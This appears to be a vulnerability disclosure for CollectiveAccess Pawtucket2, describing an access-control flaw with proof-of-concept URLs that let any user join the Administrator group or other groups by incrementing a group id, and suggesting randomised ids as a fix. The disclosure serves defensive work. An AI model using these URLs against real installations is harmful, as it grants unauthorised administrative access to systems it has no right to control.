Improper Access Control in collectiveaccess/pawtucket2
Sep 30th 2021
An attacker can join any user group in the Pawtucket2 interface as the URLs are not being randomised
Proof of Concept
Any attacker can join the Administrator group using: http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/2 An attacker can join any group by incrementing the number by 1: http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/1 http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/3 http://[PAWTUCKET_URL]/pawtucket/index.php/LoginReg/joinGroup/group_id/4
This vulnerability is capable of allowing attackers to join Administrator group and other groups without being invited, bypassing access controls.
Use randomized ids in user group creation and access